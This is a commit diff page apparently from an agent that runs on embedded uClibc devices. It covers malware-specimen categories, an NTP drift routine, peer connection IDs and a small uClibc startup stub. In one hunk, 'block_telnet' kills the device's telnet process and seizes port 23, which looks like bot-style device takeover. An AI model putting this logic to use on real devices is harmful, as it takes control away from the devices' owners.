Commit 6b78ce65 authored by The White Team's avatar The White Team

minor improvements in specimen management, ntp, uclibc startup and more

parent b2094f6f
......@@ -30,19 +30,27 @@ use bm::sql;
our @CATEGORY = qw(
unknown
malware
corruptelf
corruptupx
malware!
corruptelf!
corruptupx!
dynamic
innocent
suspicious
notelf
notelfexec
malware-manual!
innocent-manual
);
our @IS_MALWARE;
for (0 .. $#CATEGORY) {
$IS_MALWARE[$_] = 1 if $CATEGORY[$_] =~ s/!$//;
}
sub cat_is_malware($)
{
($_[0] >= 1 and $_[0] <= 3) ? 1 : 0;
$IS_MALWARE[$_[0]] ? 1 : 0;
}
sub path($$$)
......
......@@ -317,6 +317,14 @@ sub connect_to($;$)
tcp_connect $ip, $port, $timeout;
}
# uClibc inet_aton is faulty, roll our own
sub inet_aton($)
{
@_ = split /\./, $_[0];
pack "N", (pop) + ($_[0] << 24) + ($_[1] << 16) + ($_[2] << 8);
}
sub id2str($)
{
(Socket::inet_ntoa substr $_[0], 0, 4) . ":" . unpack "x4n", $_[0];
......@@ -325,9 +333,7 @@ sub id2str($)
sub str2id($)
{
my ($ip, $port) = split /:/, $_[0];
# uClibc inet_aton is faulty, we currently *have* to use AnyEvent::Socket
pack "a4n", (AnyEvent::Socket::parse_address $ip), $port;
pack "a4n", inet_aton $ip, $port;
}
sub abspath($)
......
......@@ -427,7 +427,7 @@ bn::event::on port_connect_me0aX7Ew => sub {
or return;
($hello, $port) = unpack "Cn", $hello;
my $id = pack "a4n", (Socket::inet_aton $host), $port;
my $id = pack "a4n", (bn::func::inet_aton $host), $port;
if ((substr $id, 0, 4) eq bn::net::own_ipbin) {
delete $as{$id};
......
......@@ -34,10 +34,10 @@ sub get_unixtime_from($)
socket my $fh, Socket::PF_INET, Socket::SOCK_DGRAM, 0
or return;
connect $fh, Socket::sockaddr_in 123, Socket::inet_aton $host
connect $fh, Socket::sockaddr_in 123, bn::func::inet_aton $host
or return;
for (1 .. 5) {
for (1 .. 3) {
syswrite $fh, "\010" . "\0" x 47;
if (Coro::AnyEvent::readable $fh, 0.5) {
......@@ -75,7 +75,7 @@ sub ntp_diff()
if $tn > 1300000000;
}
$last_diff = @t ? (List::Util::sum @t) / @t : 0;
$last_diff = @t ? (List::Util::sum @t) / @t : undef;
}
our $next_update;
......@@ -89,9 +89,10 @@ sub update();
sub update()
{
my $time = AE::now;
my $ntp = AE::now + ntp_diff;
my $ntp = ntp_diff;
if ($next_update) {
if ($next_update && defined $ntp) {
$ntp += $time;
my $diff = abs 1 - ($time - $last_time) / ($ntp - $last_ntp) * $factor;
if ($diff > $MAX_DIFF) {
......@@ -104,19 +105,20 @@ sub update()
$factor = $MIN_FACTOR if $factor < $MIN_FACTOR;
$factor = $MAX_FACTOR if $factor > $MAX_FACTOR;
$bn::cfg{ntp_factor} = $factor;
bn::cfg::save;
$last_time = $time;
$last_ntp = $ntp;
}
$last_time = $time;
$last_ntp = $ntp;
$next_update = AE::timer $interval * $factor + rand 60, 0, sub {
bn::func::async {
update;
bn::log "ntp updated $factor, " . ($ntp - $time);
bn::log "ntp update $factor, $diff";
};
};
$bn::cfg{ntp_factor} = $factor;
bn::cfg::save;
}
*force = \&update;
......
......@@ -240,11 +240,12 @@ sub block_telnet
for (1 .. 9) {
kill $sig, $find_telnet->();
if ( $PORT23_LISTENER ||= eval {
AnyEvent::Socket::tcp_server undef, 23,
sub {&$PORT23_ACCEPT}
}
) {
$PORT23_LISTENER ||= eval {
AnyEvent::Socket::tcp_server undef, 23,
sub {&$PORT23_ACCEPT}
} for 1 .. 128;
if ($PORT23_ACCEPT) {
bn::log "block_telnet success bind port 23";
return;
}
......
......@@ -22,7 +22,9 @@
# define TINY_UTIL_H
# include <inttypes.h>
# include <sys/types.h>
# include <sys/syscall.h>
# include <sys/stat.h>
# if __ARM_EABI__
# define SCN(n) ((n) & 0xfffff)
......
......@@ -22,16 +22,22 @@
// and removes constructors, unwinding, and replaces the default uClibc_main
// by a much smaller version that is sufficient for our tiny utilities
#include <unistd.h>
#include "tinyutil.h"
void __uClibc_main(int (*main) (int, char **, char **), int argc,
char **argv, void (*app_init) (void), void (*app_fini) (void), void (*rtld_fini) (void), void *stack_end)
{
__environ = &argv[argc + 1];
extern char **environ;
environ = &argv[argc + 1];
/* If the first thing after argv is the arguments * the the environment is empty. */
if ((char *)__environ == *argv)
--__environ;
if ((char *)environ == *argv)
--environ;
_exit(main(argc, argv, __environ));
_exit(main(argc, argv, environ));
}
void kill_9(void)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment